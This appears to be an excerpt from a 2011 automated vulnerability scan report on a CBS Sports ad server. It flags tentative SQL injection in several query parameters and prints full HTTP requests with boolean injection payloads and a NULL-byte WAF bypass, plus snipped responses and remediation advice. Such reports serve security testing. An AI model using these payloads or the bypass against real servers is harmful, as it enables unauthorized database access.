GET /mac-ad?META&ADSEPARATOR=%3B&GLOBAL&REQID=1&CLIENT:ID=SJS&CELT=jph&PAGESTATE=&SITE=175&BRAND=59&NCAT=22058%3A22207%3A&NODE=22207&PTYPE=2001&PGUID=TbiQ3wq0GVcAACnZCmE&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_EXCLUDE=golf&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=35742613&ADREQ&SP=234&POS=100&WIDTH=970&HEIGHT=0&cookiesOn=1&divId=cbsiad234_100&ADREQ&SP=110&POS=100&cookiesOn=1&divId=cbsiad110_100&ADREQ&SP=1613363790'%20or%201%3d1--%20&POS=100&WIDTH=300&HEIGHT=260&cookiesOn=1&divId=cbsiad16_100&ADREQ&SP=119&POS=100&cookiesOn=1&divId=cbsiad119_100 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/golf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response 1

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:04:35 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:04:35 GMT
Content-Length: 15047

/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad234_100",segmentId:"504465",rotatorId:"15989",creativeSizeId:"207",isBlank:"0",seg_pageState:"2312;BC2312-51",adHTML:"<div id=\"madison_ad_2
...[SNIP]...
log.com.com/adlog/c/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e1:4DB88263C2B0&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.04.35/http://clk.atdmt.com/COM/go/305845692/direct;pc.504465/01/2011.04.27.22.04.35\" target=\"_blank\"><img src=\"http://adlog.com.com/adlog/i/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e1:4DB88263C2B0&orh=cbssports.com&ort=&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&dvar=dvar%255fexclude%253dgolf%2523dvar%255finstlang%253den%252dUS%2523dvar%255fsession%253dc%2523dvar%255fsubsession%253d4%2523dvar%255fuser%253danon&ucat_rsi=%2526&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.04.35/http://i.i.com.com/cnwk.1d/Ads/2312/10/SWA_0_Redtape_970x66_jpg.jpg\" height=\"66\" width=\"970\" alt=\"Click Here\" border=\"0\" /></a><img src=\"http://view.atdmt.com/COM/view/305845692/direct;pc.504465/01/2011.04.27.22.04.35\" width=\"0\" height=\"0\" border=\"0\" alt=\"\" style=\"position:absolute; top:0px; left:0px\" /></center></div></div>"})/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw6.cnet.com::1493002560 2011.04.27.22.04.35 *//* MAC T 0.1.4.5 */;/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad110_100",segmentId:"503380",rotatorId:"18229",creativeSizeId:"79",isBlank:"0",seg_pageState:"",adHTML:"<style type=\"text/css\"> @import \"http://i.i.com.com/cnwk.1d/Ads/common/css/SportsSkyOne/SportsSkyOne.css\";</style>\n<ul class=\"adsSportsSkyOne\">\n <li id=\"item_1_503380\" style=\"display:block;\">\n <a class=\"adsSportsSkyOne_img\" href=\"http://adlog.com.com/adlog/c/r=18229&sg=503380&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&am
...[SNIP]...

Request 2

GET /mac-ad?META&ADSEPARATOR=%3B&GLOBAL&REQID=1&CLIENT:ID=SJS&CELT=jph&PAGESTATE=&SITE=175&BRAND=59&NCAT=22058%3A22207%3A&NODE=22207&PTYPE=2001&PGUID=TbiQ3wq0GVcAACnZCmE&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_EXCLUDE=golf&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=35742613&ADREQ&SP=234&POS=100&WIDTH=970&HEIGHT=0&cookiesOn=1&divId=cbsiad234_100&ADREQ&SP=110&POS=100&cookiesOn=1&divId=cbsiad110_100&ADREQ&SP=1613363790'%20or%201%3d2--%20&POS=100&WIDTH=300&HEIGHT=260&cookiesOn=1&divId=cbsiad16_100&ADREQ&SP=119&POS=100&cookiesOn=1&divId=cbsiad119_100 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/golf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response 2

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:04:35 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:04:35 GMT
Content-Length: 15057

/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad234_100",segmentId:"504465",rotatorId:"15989",creativeSizeId:"207",isBlank:"0",seg_pageState:"2312;BC2312-51",adHTML:"<div id=\"madison_ad_2
...[SNIP]...
log.com.com/adlog/c/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e23:4DB692D21263EE&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.04.35/http://clk.atdmt.com/COM/go/305845692/direct;pc.504465/01/2011.04.27.22.04.35\" target=\"_blank\"><img src=\"http://adlog.com.com/adlog/i/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e23:4DB692D21263EE&orh=cbssports.com&ort=&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&dvar=dvar%255fexclude%253dgolf%2523dvar%255finstlang%253den%252dUS%2523dvar%255fsession%253dc%2523dvar%255fsubsession%253d4%2523dvar%255fuser%253danon&ucat_rsi=%2526&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.04.35/http://i.i.com.com/cnwk.1d/Ads/2312/10/SWA_0_Redtape_970x66_jpg.jpg\" height=\"66\" width=\"970\" alt=\"Click Here\" border=\"0\" /></a><img src=\"http://view.atdmt.com/COM/view/305845692/direct;pc.504465/01/2011.04.27.22.04.35\" width=\"0\" height=\"0\" border=\"0\" alt=\"\" style=\"position:absolute; top:0px; left:0px\" /></center></div></div>"})/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw2.cnet.com::1544677696 2011.04.27.22.04.35 *//* MAC T 0.1.4.5 */;/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad110_100",segmentId:"503380",rotatorId:"18229",creativeSizeId:"79",isBlank:"0",seg_pageState:"",adHTML:"<style type=\"text/css\"> @import \"http://i.i.com.com/cnwk.1d/Ads/common/css/SportsSkyOne/SportsSkyOne.css\";</style>\n<ul class=\"adsSportsSkyOne\">\n <li id=\"item_1_503380\" style=\"display:block;\">\n <a class=\"adsSportsSkyOne_img\" href=\"http://adlog.com.com/adlog/c/r=18229&sg=503380&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&c
...[SNIP]...

1.11. http://mads.cbssports.com/mac-ad [ADREQ&SP parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The ADREQ&SP parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ADREQ&SP parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mac-ad?META&ADSEPARATOR=%3B&GLOBAL&REQID=1&CLIENT:ID=SJS&CELT=jph&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=96082330&ADREQ&SP=234&POS=100&WIDTH=970&HEIGHT=0&cookiesOn=1&divId=cbsiad234_100&ADREQ&SP=110&POS=100&cookiesOn=1&divId=cbsiad110_100&ADREQ&SP=16%00'&POS=100&WIDTH=300&HEIGHT=260&cookiesOn=1&divId=cbsiad16_100&ADREQ&SP=119&POS=100&cookiesOn=1&divId=cbsiad119_100 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response 1

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:10:50 GMT
Server: Apache/2.2
Content-Length: 6540
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:10:50 GMT

/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad234_100",segmentId:"1815",rotatorId:"18684",creativeSizeId:"4",isBlank:"1",seg_pageState:"",adHTML:"<img src=\"http://adl
...[SNIP]...
<a href=\"http://www.eyewonderlabs.com/ct2.cfm?ewbust=0&guid=0&ewadid=125884&eid=1455503&file=http://cdn.eyewonder.com/100125/769267/1455503/NOSCRIPTfailover.gif&pnl=MainBanner&type=0&name=Clickthru-NOSCRIPT&num=1&time=0&diff=0&clkX=&clkY=&click=http://ad.doubleclick.net/clk;238359628;61638243;s;pc=cbs504357\" target=\"_blank\">
...[SNIP]...

Request 2

GET /mac-ad?META&ADSEPARATOR=%3B&GLOBAL&REQID=1&CLIENT:ID=SJS&CELT=jph&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=96082330&ADREQ&SP=234&POS=100&WIDTH=970&HEIGHT=0&cookiesOn=1&divId=cbsiad234_100&ADREQ&SP=110&POS=100&cookiesOn=1&divId=cbsiad110_100&ADREQ&SP=16%00''&POS=100&WIDTH=300&HEIGHT=260&cookiesOn=1&divId=cbsiad16_100&ADREQ&SP=119&POS=100&cookiesOn=1&divId=cbsiad119_100 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response 2

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:10:52 GMT
Server: Apache/2.2
Content-Length: 5506
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:10:52 GMT

/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad234_100",segmentId:"1815",rotatorId:"18684",creativeSizeId:"4",isBlank:"1",seg_pageState:"",adHTML:"<img src=\"http://adl
...[SNIP]...

1.12. http://mads.cbssports.com/mac-ad [DVAR_SUBSESSION parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The DVAR_SUBSESSION parameter appears to be vulnerable to SQL injection attacks. The payloads 10971543'%20or%201%3d1--%20 and 10971543'%20or%201%3d2--%20 were each submitted in the DVAR_SUBSESSION parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mac-ad?META&ADSEPARATOR=%3B&GLOBAL&REQID=1&CLIENT:ID=SJS&CELT=jph&PAGESTATE=&SITE=175&BRAND=59&NCAT=22058%3A22207%3A&NODE=22207&PTYPE=2001&PGUID=TbiQ3wq0GVcAACnZCmE&DVAR_SESSION=c&DVAR_SUBSESSION=410971543'%20or%201%3d1--%20&cookiesOn=1&DVAR_EXCLUDE=golf&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=35742613&ADREQ&SP=234&POS=100&WIDTH=970&HEIGHT=0&cookiesOn=1&divId=cbsiad234_100&ADREQ&SP=110&POS=100&cookiesOn=1&divId=cbsiad110_100&ADREQ&SP=16&POS=100&WIDTH=300&HEIGHT=260&cookiesOn=1&divId=cbsiad16_100&ADREQ&SP=119&POS=100&cookiesOn=1&divId=cbsiad119_100 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/golf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response 1

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:02:05 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:02:05 GMT
Content-Length: 17183

/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad234_100",segmentId:"504465",rotatorId:"15989",creativeSizeId:"207",isBlank:"0",seg_pageState:"2312;BC2312-51",adHTML:"<div id=\"madison_ad_2
...[SNIP]...
log.com.com/adlog/c/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e26:4DB62DED153CD6&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.02.05/http://clk.atdmt.com/COM/go/305845692/direct;pc.504465/01/2011.04.27.22.02.05\" target=\"_blank\"><img src=\"http://adlog.com.com/adlog/i/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e26:4DB62DED153CD6&orh=cbssports.com&ort=&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&dvar=dvar%255fexclude%253dgolf%2523dvar%255finstlang%253den%252dUS%2523dvar%255fsession%253dc%2523dvar%255fsubsession%253d410971543%2520or%25201%253d1%252d%252d%2520%2523dvar%255fuser%253danon&ucat_rsi=%2526&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.02.05/http://i.i.com.com/cnwk.1d/Ads/2312/10/SWA_0_Redtape_970x66_jpg.jpg\" height=\"66\" width=\"970\" alt=\"Click Here\" border=\"0\" /></a><img src=\"http://view.atdmt.com/COM/view/305845692/direct;pc.504465/01/2011.04.27.22.02.05\" width=\"0\" height=\"0\" border=\"0\" alt=\"\" style=\"position:absolute; top:0px; left:0px\" /></center></div></div>"})/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw8.cnet.com::1767131456 2011.04.27.22.02.05 *//* MAC T 0.1.4.a */;/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad110_100",segmentId:"503380",rotatorId:"18229",creativeSizeId:"79",isBlank:"0",seg_pageState:"",adHTML:"<style type=\"text/css\"> @import \"http://i.i.com.com/cnwk.1d/Ads/common/css/SportsSkyOne/SportsSkyOne.css\";</style>\n<ul class=\"adsSportsSkyOne\">\n <li id=\"item_1_503380\" style=\"display:block;\">\n <a class=\"adsSportsSkyOne_img\" href=\"http://adlog.com.com/adlog/c/r=18229&sg=503380&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=1
...[SNIP]...

Request 2

GET /mac-ad?META&ADSEPARATOR=%3B&GLOBAL&REQID=1&CLIENT:ID=SJS&CELT=jph&PAGESTATE=&SITE=175&BRAND=59&NCAT=22058%3A22207%3A&NODE=22207&PTYPE=2001&PGUID=TbiQ3wq0GVcAACnZCmE&DVAR_SESSION=c&DVAR_SUBSESSION=410971543'%20or%201%3d2--%20&cookiesOn=1&DVAR_EXCLUDE=golf&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=35742613&ADREQ&SP=234&POS=100&WIDTH=970&HEIGHT=0&cookiesOn=1&divId=cbsiad234_100&ADREQ&SP=110&POS=100&cookiesOn=1&divId=cbsiad110_100&ADREQ&SP=16&POS=100&WIDTH=300&HEIGHT=260&cookiesOn=1&divId=cbsiad16_100&ADREQ&SP=119&POS=100&cookiesOn=1&divId=cbsiad119_100 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/golf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response 2

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:02:06 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:02:06 GMT
Content-Length: 17172

/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad234_100",segmentId:"504465",rotatorId:"15989",creativeSizeId:"207",isBlank:"0",seg_pageState:"2312;BC2312-51",adHTML:"<div id=\"madison_ad_2
...[SNIP]...
log.com.com/adlog/c/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e6:4DB87BE0113DC&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.02.06/http://clk.atdmt.com/COM/go/305845692/direct;pc.504465/01/2011.04.27.22.02.06\" target=\"_blank\"><img src=\"http://adlog.com.com/adlog/i/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e6:4DB87BE0113DC&orh=cbssports.com&ort=&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&dvar=dvar%255fexclude%253dgolf%2523dvar%255finstlang%253den%252dUS%2523dvar%255fsession%253dc%2523dvar%255fsubsession%253d410971543%2520or%25201%253d2%252d%252d%2520%2523dvar%255fuser%253danon&ucat_rsi=%2526&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.02.06/http://i.i.com.com/cnwk.1d/Ads/2312/10/SWA_0_Redtape_970x66_jpg.jpg\" height=\"66\" width=\"970\" alt=\"Click Here\" border=\"0\" /></a><img src=\"http://view.atdmt.com/COM/view/305845692/direct;pc.504465/01/2011.04.27.22.02.06\" width=\"0\" height=\"0\" border=\"0\" alt=\"\" style=\"position:absolute; top:0px; left:0px\" /></center></div></div>"})/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw20.cnet.com::1684199744 2011.04.27.22.02.06 *//* MAC T 0.0.3.4 */;/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad110_100",segmentId:"503380",rotatorId:"18229",creativeSizeId:"79",isBlank:"0",seg_pageState:"",adHTML:"<style type=\"text/css\"> @import \"http://i.i.com.com/cnwk.1d/Ads/common/css/SportsSkyOne/SportsSkyOne.css\";</style>\n<ul class=\"adsSportsSkyOne\">\n <li id=\"item_1_503380\" style=\"display:block;\">\n <a class=\"adsSportsSkyOne_img\" href=\"http://adlog.com.com/adlog/c/r=18229&sg=503380&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&
...[SNIP]...

1.13. http://mads.cbssports.com/mac-ad [POS parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The POS parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the POS parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mac-ad?META&ADSEPARATOR=%3B&GLOBAL&REQID=1&CLIENT:ID=SJS&CELT=jph&PAGESTATE=&SITE=175&BRAND=59&NCAT=22058%3A22207%3A&NODE=22207&PTYPE=2001&PGUID=TbiQ3wq0GVcAACnZCmE&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_EXCLUDE=golf&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=35742613&ADREQ&SP=234&POS=100&WIDTH=970&HEIGHT=0&cookiesOn=1&divId=cbsiad234_100&ADREQ&SP=110&POS=100&cookiesOn=1&divId=cbsiad110_100&ADREQ&SP=16&POS=100%20and%201%3d1--%20&WIDTH=300&HEIGHT=260&cookiesOn=1&divId=cbsiad16_100&ADREQ&SP=119&POS=100&cookiesOn=1&divId=cbsiad119_100 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/golf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response 1

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:04:40 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:04:40 GMT
Content-Length: 15034

/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad234_100",segmentId:"504465",rotatorId:"15989",creativeSizeId:"207",isBlank:"0",seg_pageState:"2312;BC2312-51",adHTML:"<div id=\"madison_ad_2
...[SNIP]...
og.com.com/adlog/c/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e13:4DB85B782A447&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.04.40/http://clk.atdmt.com/COM/go/305845692/direct;pc.504465/01/2011.04.27.22.04.40\" target=\"_blank\"><img src=\"http://adlog.com.com/adlog/i/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e13:4DB85B782A447&orh=cbssports.com&ort=&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&dvar=dvar%255fexclude%253dgolf%2523dvar%255finstlang%253den%252dUS%2523dvar%255fsession%253dc%2523dvar%255fsubsession%253d4%2523dvar%255fuser%253danon&ucat_rsi=%2526&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.04.40/http://i.i.com.com/cnwk.1d/Ads/2312/10/SWA_0_Redtape_970x66_jpg.jpg\" height=\"66\" width=\"970\" alt=\"Click Here\" border=\"0\" /></a><img src=\"http://view.atdmt.com/COM/view/305845692/direct;pc.504465/01/2011.04.27.22.04.40\" width=\"0\" height=\"0\" border=\"0\" alt=\"\" style=\"position:absolute; top:0px; left:0px\" /></center></div></div>"})/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw19.cnet.com::1375332672 2011.04.27.22.04.40 *//* MAC T 0.1.4.5 */;/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad110_100",segmentId:"503380",rotatorId:"18229",creativeSizeId:"79",isBlank:"0",seg_pageState:"",adHTML:"<style type=\"text/css\"> @import \"http://i.i.com.com/cnwk.1d/Ads/common/css/SportsSkyOne/SportsSkyOne.css\";</style>\n<ul class=\"adsSportsSkyOne\">\n <li id=\"item_1_503380\" style=\"display:block;\">\n <a class=\"adsSportsSkyOne_img\" href=\"http://adlog.com.com/adlog/c/r=18229&sg=503380&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid
...[SNIP]...

Request 2

GET /mac-ad?META&ADSEPARATOR=%3B&GLOBAL&REQID=1&CLIENT:ID=SJS&CELT=jph&PAGESTATE=&SITE=175&BRAND=59&NCAT=22058%3A22207%3A&NODE=22207&PTYPE=2001&PGUID=TbiQ3wq0GVcAACnZCmE&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_EXCLUDE=golf&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=35742613&ADREQ&SP=234&POS=100&WIDTH=970&HEIGHT=0&cookiesOn=1&divId=cbsiad234_100&ADREQ&SP=110&POS=100&cookiesOn=1&divId=cbsiad110_100&ADREQ&SP=16&POS=100%20and%201%3d2--%20&WIDTH=300&HEIGHT=260&cookiesOn=1&divId=cbsiad16_100&ADREQ&SP=119&POS=100&cookiesOn=1&divId=cbsiad119_100 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/golf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response 2

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:04:41 GMT
Server: Apache/2.2
Pragma: no-cache
